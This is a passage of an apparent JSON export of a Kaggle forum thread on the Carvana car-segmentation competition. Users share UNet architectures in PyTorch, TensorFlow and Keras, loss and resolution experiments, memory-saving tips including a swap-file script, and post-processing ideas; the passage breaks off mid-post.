      "content": "<p>Next experiment plans:</p>\n\n<p>baseline system:  using as 256x256 input and predict 256x256.</p>\n\n<p>comparsion system:</p>\n\n<pre><code> 1. Given 256x256 images, crop 128x128 for training and predict 128x128.  During testing, 256x256 is divided into overlapping 128x128  patches to do inference. The results are then combined. \n\n 2. Given 128x128 as input. Train to predict 256x256\n\n 3. Given 128x128 as input. Train to predict 512x512. During testing, 512x512 prediction is downsized to 256x256.\n</code></pre>",
      "rawMarkdown": "Next experiment plans:\n\nbaseline system:  using as 256x256 input and predict 256x256.\n\ncomparsion system:\n\n     1. Given 256x256 images, crop 128x128 for training and predict 128x128.  During testing, 256x256 is divided into overlapping 128x128  patches to do inference. The results are then combined. \n\n     2. Given 128x128 as input. Train to predict 256x256\n\n     3. Given 128x128 as input. Train to predict 512x512. During testing, 512x512 prediction is downsized to 256x256.",
      "votes": null
    },
    {
      "id": "208856",
      "postDate": "07/31/2017 11:06:41",
      "content": "<p>a possible solution?</p>",
      "rawMarkdown": "a possible solution?",
      "votes": null
    },
    {
      "id": "208869",
      "postDate": "07/31/2017 12:29:03",
      "content": "<p>Hello Heng, </p>\n\n<p>Do you think resize image's extension will affect the score? <br>\nIs it better to resize and write as jpg format than png ?</p>",
      "rawMarkdown": "Hello Heng, \n\nDo you think resize image's extension will affect the score?  \nIs it better to resize and write as jpg format than png ?",
      "votes": null
    },
    {
      "id": "208877",
      "postDate": "07/31/2017 12:59:18",
      "content": "<p>it is a new record!  LB score =0.990 for 128x128. The results of using Bce loss + dice loss, i.e. dual loss back propagated. The training iterations are reduced also.</p>\n\n<p><img src=\"https://storage.googleapis.com/kaggle-forum-message-attachments/208877/6962/bce_dice.png\" alt=\"enter image description here\" title=\"\"></p>",
      "rawMarkdown": "it is a new record!  LB score =0.990 for 128x128. The results of using Bce loss + dice loss, i.e. dual loss back propagated. The training iterations are reduced also.\n\n ![enter image description here][1]\n\n\n  [1]: https://kaggle2.blob.core.windows.net/forum-message-attachments/208877/6962/bce_dice.png",
      "votes": null
    },
    {
      "id": "208886",
      "postDate": "07/31/2017 13:58:06",
      "content": "<p>@Bartek</p>\n\n<p>let ( downsize(x), downsize(y_hat) ) be an train sample, and  p be output prediction of CNN. </p>\n\n<p>Did you threshold(upsize(threshold(p))) or threshold(upsize(p)) for submission? I use threshold(upsize(p)) but i haven't compare which is better </p>",
      "rawMarkdown": "Bartek\n\nlet ( downsize(x), downsize(y_hat) ) be an train sample, and  p be output prediction of CNN. \n\nDid you threshold(upsize(threshold(p))) or threshold(upsize(p)) for submission? I use threshold(upsize(p)) but i haven't compare which is better",
      "votes": null
    },
    {
      "id": "208890",
      "postDate": "07/31/2017 14:07:47",
      "content": "<p>I am using this competition to improve my skills in keras. I see the model shared in this thread has been written using pytorch. Is anyone using keras/tensorflow to write an equivalent model?</p>",
      "rawMarkdown": "I am using this competition to improve my skills in keras. I see the model shared in this thread has been written using pytorch. Is anyone using keras/tensorflow to write an equivalent model?",
      "votes": null
    },
    {
      "id": "208891",
      "postDate": "07/31/2017 14:09:16",
      "content": "<p>When using bigger images, how do you guys save the predictions? Currently i'm using numpy array but with bigger image size my 32gb ram gets memory error.</p>",
      "rawMarkdown": "When using bigger images, how do you guys save the predictions? Currently i'm using numpy array but with bigger image size my 32gb ram gets memory error.",
      "votes": null
    },
    {
      "id": "208910",
      "postDate": "07/31/2017 14:50:26",
      "content": "<p>my ram is 128 gb. Your prediction comes from CNN, which you can save at every e.g. 1000 iterations. your results will be in chunks of 1000. 512x512 prediction mask (float32) is about 104 GB when saves as npy file.</p>",
      "rawMarkdown": "my ram is 128 gb. Your prediction comes from CNN, which you can save at every e.g. 1000 iterations. your results will be in chunks of 1000. 512x512 prediction mask (float32) is about 104 GB when saves as npy file.",
      "votes": null
    },
    {
      "id": "208912",
      "postDate": "07/31/2017 14:52:01",
      "content": "<p>@Eugene  I am not sure but i think image compression should have negligible effects</p>",
      "rawMarkdown": "Eugene  I am not sure but i think image compression should have negligible effects",
      "votes": null
    },
    {
      "id": "208914",
      "postDate": "07/31/2017 14:53:59",
      "content": "<p>You could virtually increase your memory size by using a swap file:</p>\n\n<pre><code>#!/bin/bash\n# swap-create: creates 20 GB swap file\n\nSWAP_FILE=${HOME}/swapfile\n\nsudo dd if=/dev/zero of=${SWAP_FILE} bs=512M count=40\nsudo mkswap ${SWAP_FILE}\nsudo chmod 600 ${SWAP_FILE}\nsudo swapon ${SWAP_FILE}\n</code></pre>",
      "rawMarkdown": "You could virtually increase your memory size by using a swap file:\n\n\n    #!/bin/bash\n    # swap-create: creates 20 GB swap file\n    \n    SWAP_FILE=${HOME}/swapfile\n    \n    sudo dd if=/dev/zero of=${SWAP_FILE} bs=512M count=40\n    sudo mkswap ${SWAP_FILE}\n    sudo chmod 600 ${SWAP_FILE}\n    sudo swapon ${SWAP_FILE}",
      "votes": null
    },
    {
      "id": "208927",
      "postDate": "07/31/2017 15:20:30",
      "content": "<p>yet another simple idea is to use initial low resolution mask prediction to get a bounding box of the car. They crop and resize the bounding box (with border) to some good size like 512x512. This reduces the the background and maximizes the object in the 512x512 input.</p>",
      "rawMarkdown": "yet another simple idea is to use initial low resolution mask prediction to get a bounding box of the car. They crop and resize the bounding box (with border) to some good size like 512x512. This reduces the the background and maximizes the object in the 512x512 input.",
      "votes": null
    },
    {
      "id": "208933",
      "postDate": "07/31/2017 15:34:20",
      "content": "<p>I have checked last @Heng CherKeng script and it really produce 0.995 score using 512 images, thanks! Now I'm ready to find a bug in my code:)</p>\n\n<p>About memory consumption when predicting I resolved it by using uint8 format instead of float32\nSo I get prediction after sigmoid function, multiply them by 255. and convert to uint8.\nAfter resizing I threshold them by 128. \nThen I use ~30GB of memory for making a prediction (having 32GB). Saved all mask for 100k images takes 25 GB (so 4x less than float32). As I have same score at LB like Heng, look like it does not hurt performance </p>\n\n<p>About cropping the removing the background from images, I think that is very good idea, which I was thinking about too.\nThe simple two-step idea is best. And it provide bigger car images at same resolution of input image. But I would have left some background around the car to enable random crop and have more information about background around car. </p>",
      "rawMarkdown": "I have checked last @Heng CherKeng script and it really produce 0.995 score using 512 images, thanks! Now I'm ready to find a bug in my code:)\n\nAbout memory consumption when predicting I resolved it by using uint8 format instead of float32\nSo I get prediction after sigmoid function, multiply them by 255. and convert to uint8.\nAfter resizing I threshold them by 128. \nThen I use ~30GB of memory for making a prediction (having 32GB). Saved all mask for 100k images takes 25 GB (so 4x less than float32). As I have same score at LB like Heng, look like it does not hurt performance \n\n\nAbout cropping the removing the background from images, I think that is very good idea, which I was thinking about too.\nThe simple two-step idea is best. And it provide bigger car images at same resolution of input image. But I would have left some background around the car to enable random crop and have more information about background around car.",
      "votes": null
    },
    {
      "id": "208979",
      "postDate": "07/31/2017 19:31:31",
      "content": "<p>You could save the numpy array in bcolz format. It's one of the fastest and a cheap way of saving numpy arrays on disk. Some utility functions to save and load bcolz arrays are here: <a href=\"https://github.com/fastai/courses/blob/master/deeplearning1/nbs/utils.py#L175-L181\">https://github.com/fastai/courses/blob/master/deeplearning1/nbs/utils.py#L175-L181</a></p>",
      "rawMarkdown": "You could save the numpy array in bcolz format. It's one of the fastest and a cheap way of saving numpy arrays on disk. Some utility functions to save and load bcolz arrays are here: https://github.com/fastai/courses/blob/master/deeplearning1/nbs/utils.py#L175-L181",
      "votes": null
    },
    {
      "id": "209100",
      "postDate": "08/01/2017 07:26:50",
      "content": "<p>@jackkwok : Will you share the code once you are done with converting this to keras</p>",
      "rawMarkdown": "jackkwok : Will you share the code once you are done with converting this to keras",
      "votes": null
    },
    {
      "id": "209122",
      "postDate": "08/01/2017 09:42:18",
      "content": "<p>yet another idea</p>",
      "rawMarkdown": "yet another idea",
      "votes": null
    },
    {
      "id": "209157",
      "postDate": "08/01/2017 12:20:04",
      "content": "<p>You are kind of sharing your code. I trained a UNet, but it marks all edges just as the attenchment. How do you remove the logo of \"carvana\"?</p>",
      "rawMarkdown": "You are kind of sharing your code. I trained a UNet, but it marks all edges just as the attenchment. How do you remove the logo of \"carvana\"?",
      "votes": null
    },
    {
      "id": "209167",
      "postDate": "08/01/2017 12:37:12",
      "content": "<p>Verify the training, your model is not creating a mask around the car. <br>\nProbably it doesn't have learn anything.</p>",
      "rawMarkdown": "Verify the training, your model is not creating a mask around the car.   \nProbably it doesn't have learn anything.",
      "votes": null
    },
    {
      "id": "209187",
      "postDate": "08/01/2017 13:37:21",
      "content": "<p>I'm also using adam, I'm wondering how you set the initial super parameters?</p>",
      "rawMarkdown": "I'm also using adam, I'm wondering how you set the initial super parameters?",
      "votes": null
    },
    {
      "id": "209188",
      "postDate": "08/01/2017 13:39:41",
      "content": "<p>I'm working on tensorflow version</p>",
      "rawMarkdown": "I'm working on tensorflow version",
      "votes": null
    },
    {
      "id": "209193",
      "postDate": "08/01/2017 14:04:46",
      "content": "<p>Do you know what is causing the spots in the wheels? Is it the training data?</p>\n\n<p>I have only noticed one image where the manually created mask trimmed in between the wheel's spokes, but I haven't reviewed enough images to know if it is a common or rare issue.</p>",
      "rawMarkdown": "Do you know what is causing the spots in the wheels? Is it the training data?\n\nI have only noticed one image where the manually created mask trimmed in between the wheel's spokes, but I haven't reviewed enough images to know if it is a common or rare issue.",
      "votes": null
    },
    {
      "id": "209205",
      "postDate": "08/01/2017 14:56:50",
      "content": "<p>@ironbar The code is as follows, just trained a unet. I don't know whether the model construct method is OK. It seems that the model just find all the edges, and do not create a car mask.</p>\n\n<pre><code>\nimport numpy as np\nimport tensorflow as tf\nfrom PIL import Image\nfrom tf_unet import unet, image_util, util\n\nbase_dir = \"/home/xrq/prog/kaggle/image_masking\"\noutput_path = base_dir + \"/script/tmp\"\nmodel_path = base_dir + '/script/model'\ntest_pic_path = base_dir + \"/script/00087a6bd4dc_01_predict.jpg\"\n\ndata_provider = image_util.ImageDataProvider(base_dir + \"/dataset/train/*\", data_suffix='.jpg', mask_suffix='_mask.gif')\nnet = unet.Unet(channels=3, n_class=2, cost='cross_entropy', layers=3, features_root=1)\ntrainer = unet.Trainer(net, batch_size=1, optimizer='momentum')\ntrainer.train(data_provider, output_path, training_iters=10, epochs=100, dropout=0.5, display_step=1, restore=False, write_graph=False)\n\ninit = tf.global_variables_initializer()\nwith tf.Session() as sess:\n    # Initialize variables\n    sess.run(init)\n\n    net.save(sess, model_path)\n    pic = np.array(Image.open(base_dir + '/dataset/train/00087a6bd4dc_01.jpg'), np.float32)\n    prediction = net.predict(model_path, np.reshape(pic, (1, 1280, 1918, 3)))\n\n    res = np.reshape(prediction, (1240, 1876, 2))[:, :, 1]\n    img = Image.fromarray(res * 255)\n    if img.mode != 'RGB':\n        img = img.convert('RGB')\n    img.save(test_pic_path)\n    img.show()\n</code></pre>",
      "rawMarkdown": "ironbar The code is as follows, just trained a unet. I don't know whether the model construct method is OK. It seems that the model just find all the edges, and do not create a car mask.\n\n<pre><code>\nimport numpy as np\nimport tensorflow as tf\nfrom PIL import Image\nfrom tf_unet import unet, image_util, util\n\nbase_dir = \"/home/xrq/prog/kaggle/image_masking\"\noutput_path = base_dir + \"/script/tmp\"\nmodel_path = base_dir + '/script/model'\ntest_pic_path = base_dir + \"/script/00087a6bd4dc_01_predict.jpg\"\n\ndata_provider = image_util.ImageDataProvider(base_dir + \"/dataset/train/*\", data_suffix='.jpg', mask_suffix='_mask.gif')\nnet = unet.Unet(channels=3, n_class=2, cost='cross_entropy', layers=3, features_root=1)\ntrainer = unet.Trainer(net, batch_size=1, optimizer='momentum')\ntrainer.train(data_provider, output_path, training_iters=10, epochs=100, dropout=0.5, display_step=1, restore=False, write_graph=False)\n\ninit = tf.global_variables_initializer()\nwith tf.Session() as sess:\n    # Initialize variables\n    sess.run(init)\n\n    net.save(sess, model_path)\n    pic = np.array(Image.open(base_dir + '/dataset/train/00087a6bd4dc_01.jpg'), np.float32)\n    prediction = net.predict(model_path, np.reshape(pic, (1, 1280, 1918, 3)))\n    \n    res = np.reshape(prediction, (1240, 1876, 2))[:, :, 1]\n    img = Image.fromarray(res * 255)\n    if img.mode != 'RGB':\n        img = img.convert('RGB')\n    img.save(test_pic_path)\n    img.show()\n</code></pre>",
      "votes": null
    },
    {
      "id": "209231",
      "postDate": "08/01/2017 16:15:48",
      "content": "<p>segmentation tricks!</p>\n\n<p>see pascal voc 2012 leader board method description</p>\n\n<p><a href=\"http://host.robots.ox.ac.uk:8080/leaderboard/displaylb.php?challengeid=11&amp;compid=6\">http://host.robots.ox.ac.uk:8080/leaderboard/displaylb.php?challengeid=11&amp;compid=6</a></p>\n\n<p>e.g   CRF is applied as post-processing step.</p>\n\n<p>We also use densecrf as post-processing to refine object boundaries.</p>",
      "rawMarkdown": "segmentation tricks!\n\nsee pascal voc 2012 leader board method description\n\nhttp://host.robots.ox.ac.uk:8080/leaderboard/displaylb.php?challengeid=11&amp;compid=6\n\ne.g   CRF is applied as post-processing step.\n\nWe also use densecrf as post-processing to refine object boundaries.",
      "votes": null
    },
    {
      "id": "209393",
      "postDate": "08/02/2017 04:52:12",
      "content": "<p>finally a solution for 0.996. please refer to for code release 08-02 and experiment. Here is a summary for unet for predicting 1024x1024 (batch size=8).</p>\n\n<ol>\n<li><p>construct a 512x512 input unet</p></li>\n<li><p>the last feature map is 512x512</p></li>\n<li><p>concat this last feature with input. upsize to 1024x1024.</p></li>\n<li><p>add conv filters 3x3, bn, relu, etc ...</p></li>\n<li><p>finally, a classifier layer to predict results at 1024x1024</p></li>\n</ol>\n\n<p>Note that there is numerical instability. I am not sure if it is due to unstable bce loss or BN layers (too little train samples can cause running std =0?). I will find out if I have time.</p>\n\n<p><img src=\"https://storage.googleapis.com/kaggle-forum-message-attachments/209393/6970/1024.png\" alt=\"enter image description here\" title=\"\"></p>",
      "rawMarkdown": "finally a solution for 0.996. please refer to for code release 08-02 and experiment. Here is a summary for unet for predicting 1024x1024 (batch size=8).\n\n1. construct a 512x512 input unet\n\n2. the last feature map is 512x512\n\n3. concat this last feature with input. upsize to 1024x1024.\n\n4. add conv filters 3x3, bn, relu, etc ...\n\n5. finally, a classifier layer to predict results at 1024x1024\n\n\nNote that there is numerical instability. I am not sure if it is due to unstable bce loss or BN layers (too little train samples can cause running std =0?). I will find out if I have time.\n\n ![enter image description here][1]\n\n\n  [1]: https://kaggle2.blob.core.windows.net/forum-message-attachments/209393/6970/1024.png",
      "votes": null
    },
    {
      "id": "209397",
      "postDate": "08/02/2017 05:05:29",
      "content": "<p>yet another idea is to use distance transform to weigh the boundary pixels in the loss function.</p>",
      "rawMarkdown": "yet another idea is to use distance transform to weigh the boundary pixels in the loss function.",
      "votes": null
    },
    {
      "id": "209438",
      "postDate": "08/02/2017 08:21:08",
      "content": "<p>e..,maybe input is 512x512 and you write 512 x 125? I was using 512x512 input size, 512x512 output size ,no bn layers (i have no more memory,and I think we don't need it.),it can also get 0.996.</p>",
      "rawMarkdown": "e..,maybe input is 512x512 and you write 512 x 125? I was using 512x512 input size, 512x512 output size ,no bn layers (i have no more memory,and I think we don't need it.),it can also get 0.996.",
      "votes": null
    },
    {
      "id": "209440",
      "postDate": "08/02/2017 08:39:28",
      "content": "<p>@bang liu</p>\n\n<p>Thank you for the comments. I corrected the typo error. It should be 512x512. ' ... no bn layers ...' Maybe I can try without BN layer too. In that case, I can use greater batch size or higher resolution. Thanks!</p>\n\n<p>Note: without BN, it is easy to try in multi-gpu (and also fp16 which i try before on cifar10 before)</p>",
      "rawMarkdown": "bang liu\n\nThank you for the comments. I corrected the typo error. It should be 512x512. ' ... no bn layers ...' Maybe I can try without BN layer too. In that case, I can use greater batch size or higher resolution. Thanks!\n\nNote: without BN, it is easy to try in multi-gpu (and also fp16 which i try before on cifar10 before)",
      "votes": null
    },
    {
      "id": "209451",
      "postDate": "08/02/2017 09:25:53",
      "content": "<p>@bang liu</p>\n\n<p>how do you initialise your Unet without BN? Tried just now at my side. The UNet won't run at training  unless good initialization is given (I can merge BN in conv to do a initialization for the weights). Since the images are more or less similar, maybe that is why BN may not be that important here. Without BN, i can increase batch size from 16 to 20. The speed is faster too.</p>",
      "rawMarkdown": "bang liu\n\nhow do you initialise your Unet without BN? Tried just now at my side. The UNet won't run at training  unless good initialization is given (I can merge BN in conv to do a initialization for the weights). Since the images are more or less similar, maybe that is why BN may not be that important here. Without BN, i can increase batch size from 16 to 20. The speed is faster too.",
      "votes": null
    },
    {
      "id": "209460",
      "postDate": "08/02/2017 10:28:52",
      "content": "<p>When you train Unet without BN you have to use much lower learning rate (in range 1e-4 or lower) and longer training</p>",
      "rawMarkdown": "When you train Unet without BN you have to use much lower learning rate (in range 1e-4 or lower) and longer training",
      "votes": null
    },
    {
      "id": "209465",
      "postDate": "08/02/2017 11:16:04",
      "content": "<p>@Heng CherKeng\nHow long does 1 epoch take (on your 1080TI/Titan?) to train for the 0.996 net?</p>",
      "rawMarkdown": "Heng CherKeng\nHow long does 1 epoch take (on your 1080TI/Titan?) to train for the 0.996 net?",
      "votes": null
    },
    {
      "id": "209466",
      "postDate": "08/02/2017 11:17:51",
      "content": "<p>5.6 min using pascal titianX. The log file can be found at the google drive. see 08-20 and 07-31.\nI run about 35 epoch.</p>",
      "rawMarkdown": "5.6 min using pascal titianX. The log file can be found at the google drive. see 08-20 and 07-31.\nI run about 35 epoch.",
      "votes": null
    },
    {
      "id": "209467",
      "postDate": "08/02/2017 11:19:27",
      "content": "<p>if i got time, i am going to try this: <a href=\"https://github.com/ducha-aiki/LSUV-pytorch\">https://github.com/ducha-aiki/LSUV-pytorch</a></p>",
      "rawMarkdown": "if i got time, i am going to try this: https://github.com/ducha-aiki/LSUV-pytorch",
      "votes": null
    },
    {
      "id": "209471",
      "postDate": "08/02/2017 11:50:49",
      "content": "<p>I have not using special init method,but random normal(mean=0,std=filter_width*filter_height*channel).\nthese pic are too same,so DA and BN these method which can lead noise will be harmful .\nthe best way is increase the input size,but I gauss we can't over 0.998 because of ground true error.</p>",
      "rawMarkdown": "I have not using special init method,but random normal(mean=0,std=filter_width*filter_height*channel).\nthese pic are too same,so DA and BN these method which can lead noise will be harmful .\nthe best way is increase the input size,but I gauss we can't over 0.998 because of ground true error.",
      "votes": null
    },
    {
      "id": "209480",
      "postDate": "08/02/2017 12:42:18",
      "content": "<p>I am struggling to replicate the performance ~0.99xx with keras. Only getting ~0.97x after 20 epochs with 8 batch size\nFind below the model in keras</p>\n\n<pre><code>inputs = Input((img_rows, img_cols, 3))\nconv1 = Conv2D(16, (3, 3), activation='relu', padding='same', name = 'layer1.1')(inputs)\nconv1 = BatchNormalization()(conv1)\nconv1 = Conv2D(16, (3, 3), activation='relu', padding='same', name = 'layer1.2')(conv1)\nconv1 = BatchNormalization()(conv1)\npool1 = MaxPooling2D(pool_size=(2, 2), name = 'layer1.3')(conv1)\n\nconv2 = Conv2D(32, (3, 3), activation='relu', padding='same', name = 'layer2.1')(pool1)\nconv2 = BatchNormalization()(conv2)\nconv2 = Conv2D(32, (3, 3), activation='relu', padding='same', name = 'layer2.2')(conv2)\nconv2 = BatchNormalization()(conv2)\npool2 = MaxPooling2D(pool_size=(2, 2), name = 'layer2.3')(conv2)\n\nconv3 = Conv2D(64, (3, 3), activation='relu', padding='same', name = 'layer3.1')(pool2)\nconv3 = BatchNormalization()(conv3)\nconv3 = Conv2D(64, (3, 3), activation='relu', padding='same', name = 'layer3.2')(conv3)\nconv3 = BatchNormalization()(conv3)\npool3 = MaxPooling2D(pool_size=(2, 2), name = 'layer3.3')(conv3)\n\nconv4 = Conv2D(128, (3, 3), activation='relu', padding='same', name = 'layer4.1')(pool3)\nconv4 = BatchNormalization()(conv4)\nconv4 = Conv2D(128, (3, 3), activation='relu', padding='same', name = 'layer4.2')(conv4)\nconv4 = BatchNormalization()(conv4)\npool4 = MaxPooling2D(pool_size=(2, 2), name = 'layer4.3')(conv4)\n\nconv5 = Conv2D(256, (3, 3), activation='relu', padding='same', name = 'layer5.1')(pool4)\nconv5 = BatchNormalization()(conv5)\nconv5 = Conv2D(256, (3, 3), activation='relu', padding='same', name = 'layer5.2')(conv5)\nconv5 = BatchNormalization()(conv5)\npool5 = MaxPooling2D(pool_size=(2, 2), name = 'layer5.3')(conv5)\n\nconv6 = Conv2D(512, (3, 3), activation='relu', padding='same', name = 'layer6.1')(pool5)\nconv6 = BatchNormalization()(conv6)\nconv6 = Conv2D(512, (3, 3), activation='relu', padding='same', name = 'layer6.2')(conv6)\nconv6 = BatchNormalization()(conv6)\npool6 = MaxPooling2D(pool_size=(2, 2), name = 'layer6.3')(conv6)\n\nconv7 = Conv2D(1024, (3, 3), activation='relu', padding='same', name = 'layer7.1')(pool6)\nconv7 = BatchNormalization()(conv7)\nconv7 = Conv2D(1024, (3, 3), activation='relu', padding='same', name = 'layer7.2')(conv7)\nconv7 = BatchNormalization()(conv7)\n\nup8 = concatenate([Conv2DTranspose(512, (2, 2), strides=(2, 2), padding='same', name = 'layer8.0')(conv7), conv6], axis=3, name = 'layer8.01')\nconv8 = Conv2D(512, (3, 3), activation='relu', padding='same', name = 'layer8.1')(up8)\nconv8 = BatchNormalization()(conv8)\nconv8 = Conv2D(512, (3, 3), activation='relu', padding='same', name = 'layer8.2')(conv8)\nconv8 = BatchNormalization()(conv8)\n\nup9 = concatenate([Conv2DTranspose(256, (2, 2), strides=(2, 2), padding='same', name = 'layer9.0')(conv8), conv5], axis=3, name = 'layer9.01')\nconv9 = Conv2D(256, (3, 3), activation='relu', padding='same', name = 'layer9.1')(up9)\nconv9 = BatchNormalization()(conv9)\nconv9 = Conv2D(256, (3, 3), activation='relu', padding='same', name = 'layer9.2')(conv9)\nconv9 = BatchNormalization()(conv9)\n\nup10 = concatenate([Conv2DTranspose(256, (2, 2), strides=(2, 2), padding='same', name = 'layer10.0')(conv9), conv4], axis=3, name = 'layer10.01')\nconv10 = Conv2D(256, (3, 3), activation='relu', padding='same', name = 'layer10.1')(up10)\nconv10 = BatchNormalization()(conv10)\nconv10 = Conv2D(256, (3, 3), activation='relu', padding='same', name = 'layer10.2')(conv10)\nconv10 = BatchNormalization()(conv10)\n\nup11 = concatenate([Conv2DTranspose(128, (2, 2), strides=(2, 2), padding='same', name = 'layer11.0')(conv10), conv3], axis=3, name = 'layer11.01')\nconv11 = Conv2D(128, (3, 3), activation='relu', padding='same', name = 'layer11.1')(up11)\nconv11 = BatchNormalization()(conv11)\nconv11 = Conv2D(128, (3, 3), activation='relu', padding='same', name = 'layer11.2')(conv11)\nconv11 = BatchNormalization()(conv11)\n\nup12 = concatenate([Conv2DTranspose(64, (2, 2), strides=(2, 2), padding='same', name = 'layer12.0')(conv11), conv2], axis=3, name = 'layer12.01')\nconv12 = Conv2D(64, (3, 3), activation='relu', padding='same', name = 'layer12.1')(up12)\nconv12 = BatchNormalization()(conv12)\nconv12 = Conv2D(64, (3, 3), activation='relu', padding='same', name = 'layer12.2')(conv12)\nconv12 = BatchNormalization()(conv12)\n\nup13 = concatenate([Conv2DTranspose(32, (2, 2), strides=(2, 2), padding='same', name = 'layer13.0')(conv12), conv1], axis=3, name = 'layer13.01')\nconv13 = Conv2D(32, (3, 3), activation='relu', padding='same', name = 'layer13.1')(up13)\nconv13 = BatchNormalization()(conv13)\nconv13 = Conv2D(32, (3, 3), activation='relu', padding='same', name = 'layer13.2')(conv13)\nconv13 = BatchNormalization()(conv13)\n\nconv14 = Conv2D(1, (1, 1), activation='sigmoid')(conv13)\n# conv14 = BatchNormalization()(conv14)\n\nmodel = Model(inputs=[inputs], outputs=[conv14])\n</code></pre>",
      "rawMarkdown": "I am struggling to replicate the performance ~0.99xx with keras. Only getting ~0.97x after 20 epochs with 8 batch size\nFind below the model in keras\n\n\n    inputs = Input((img_rows, img_cols, 3))\n    conv1 = Conv2D(16, (3, 3), activation='relu', padding='same', name = 'layer1.1')(inputs)\n    conv1 = BatchNormalization()(conv1)\n    conv1 = Conv2D(16, (3, 3), activation='relu', padding='same', name = 'layer1.2')(conv1)\n    conv1 = BatchNormalization()(conv1)\n    pool1 = MaxPooling2D(pool_size=(2, 2), name = 'layer1.3')(conv1)\n\n    conv2 = Conv2D(32, (3, 3), activation='relu', padding='same', name = 'layer2.1')(pool1)\n    conv2 = BatchNormalization()(conv2)\n    conv2 = Conv2D(32, (3, 3), activation='relu', padding='same', name = 'layer2.2')(conv2)\n    conv2 = BatchNormalization()(conv2)\n    pool2 = MaxPooling2D(pool_size=(2, 2), name = 'layer2.3')(conv2)\n\n    conv3 = Conv2D(64, (3, 3), activation='relu', padding='same', name = 'layer3.1')(pool2)\n    conv3 = BatchNormalization()(conv3)\n    conv3 = Conv2D(64, (3, 3), activation='relu', padding='same', name = 'layer3.2')(conv3)\n    conv3 = BatchNormalization()(conv3)\n    pool3 = MaxPooling2D(pool_size=(2, 2), name = 'layer3.3')(conv3)\n\n    conv4 = Conv2D(128, (3, 3), activation='relu', padding='same', name = 'layer4.1')(pool3)\n    conv4 = BatchNormalization()(conv4)\n    conv4 = Conv2D(128, (3, 3), activation='relu', padding='same', name = 'layer4.2')(conv4)\n    conv4 = BatchNormalization()(conv4)\n    pool4 = MaxPooling2D(pool_size=(2, 2), name = 'layer4.3')(conv4)\n\n    conv5 = Conv2D(256, (3, 3), activation='relu', padding='same', name = 'layer5.1')(pool4)\n    conv5 = BatchNormalization()(conv5)\n    conv5 = Conv2D(256, (3, 3), activation='relu', padding='same', name = 'layer5.2')(conv5)\n    conv5 = BatchNormalization()(conv5)\n    pool5 = MaxPooling2D(pool_size=(2, 2), name = 'layer5.3')(conv5)\n    \n    conv6 = Conv2D(512, (3, 3), activation='relu', padding='same', name = 'layer6.1')(pool5)\n    conv6 = BatchNormalization()(conv6)\n    conv6 = Conv2D(512, (3, 3), activation='relu', padding='same', name = 'layer6.2')(conv6)\n    conv6 = BatchNormalization()(conv6)\n    pool6 = MaxPooling2D(pool_size=(2, 2), name = 'layer6.3')(conv6)\n    \n    conv7 = Conv2D(1024, (3, 3), activation='relu', padding='same', name = 'layer7.1')(pool6)\n    conv7 = BatchNormalization()(conv7)\n    conv7 = Conv2D(1024, (3, 3), activation='relu', padding='same', name = 'layer7.2')(conv7)\n    conv7 = BatchNormalization()(conv7)\n    \n    up8 = concatenate([Conv2DTranspose(512, (2, 2), strides=(2, 2), padding='same', name = 'layer8.0')(conv7), conv6], axis=3, name = 'layer8.01')\n    conv8 = Conv2D(512, (3, 3), activation='relu', padding='same', name = 'layer8.1')(up8)\n    conv8 = BatchNormalization()(conv8)\n    conv8 = Conv2D(512, (3, 3), activation='relu', padding='same', name = 'layer8.2')(conv8)\n    conv8 = BatchNormalization()(conv8)\n    \n    up9 = concatenate([Conv2DTranspose(256, (2, 2), strides=(2, 2), padding='same', name = 'layer9.0')(conv8), conv5], axis=3, name = 'layer9.01')\n    conv9 = Conv2D(256, (3, 3), activation='relu', padding='same', name = 'layer9.1')(up9)\n    conv9 = BatchNormalization()(conv9)\n    conv9 = Conv2D(256, (3, 3), activation='relu', padding='same', name = 'layer9.2')(conv9)\n    conv9 = BatchNormalization()(conv9)\n    \n    up10 = concatenate([Conv2DTranspose(256, (2, 2), strides=(2, 2), padding='same', name = 'layer10.0')(conv9), conv4], axis=3, name = 'layer10.01')\n    conv10 = Conv2D(256, (3, 3), activation='relu', padding='same', name = 'layer10.1')(up10)\n    conv10 = BatchNormalization()(conv10)\n    conv10 = Conv2D(256, (3, 3), activation='relu', padding='same', name = 'layer10.2')(conv10)\n    conv10 = BatchNormalization()(conv10)\n\n    up11 = concatenate([Conv2DTranspose(128, (2, 2), strides=(2, 2), padding='same', name = 'layer11.0')(conv10), conv3], axis=3, name = 'layer11.01')\n    conv11 = Conv2D(128, (3, 3), activation='relu', padding='same', name = 'layer11.1')(up11)\n    conv11 = BatchNormalization()(conv11)\n    conv11 = Conv2D(128, (3, 3), activation='relu', padding='same', name = 'layer11.2')(conv11)\n    conv11 = BatchNormalization()(conv11)\n\n    up12 = concatenate([Conv2DTranspose(64, (2, 2), strides=(2, 2), padding='same', name = 'layer12.0')(conv11), conv2], axis=3, name = 'layer12.01')\n    conv12 = Conv2D(64, (3, 3), activation='relu', padding='same', name = 'layer12.1')(up12)\n    conv12 = BatchNormalization()(conv12)\n    conv12 = Conv2D(64, (3, 3), activation='relu', padding='same', name = 'layer12.2')(conv12)\n    conv12 = BatchNormalization()(conv12)\n\n    up13 = concatenate([Conv2DTranspose(32, (2, 2), strides=(2, 2), padding='same', name = 'layer13.0')(conv12), conv1], axis=3, name = 'layer13.01')\n    conv13 = Conv2D(32, (3, 3), activation='relu', padding='same', name = 'layer13.1')(up13)\n    conv13 = BatchNormalization()(conv13)\n    conv13 = Conv2D(32, (3, 3), activation='relu', padding='same', name = 'layer13.2')(conv13)\n    conv13 = BatchNormalization()(conv13)\n\n    conv14 = Conv2D(1, (1, 1), activation='sigmoid')(conv13)\n    # conv14 = BatchNormalization()(conv14)\n\n    model = Model(inputs=[inputs], outputs=[conv14])",
      "votes": null
    },
    {
      "id": "209520",
      "postDate": "08/02/2017 14:33:08",
      "content": "<p>I didn't have time for this competition yet, but I was planning to take the approach you suggest: input all images rotations and output all masks at once.</p>\n\n<p>Other things to consider:</p>\n\n<ul>\n<li><p>Don't go too deep on UNet, as masks are placed more or less on the same region. Instead, replace the two deepest levels with a \"global convolution\" (a convolution with kernel size equal to the side of the image at that level). The number of filters should not be more than the number of cars. This way, we may reduce the number of parameters and probably create a viable 1024x1024 version.</p></li>\n<li><p>I'd suggest adding an \"upscale\" network to the workflow, after training and predicting the UNet. The input should be patches from original image stacked with the UNet output (channels R, G, B and Mask). These patches should always include border regions of mask (black and white pixels).</p></li>\n</ul>\n\n<p>Final note: I'd suggest reading this recent post about image segmentation thechniques:\n- <a 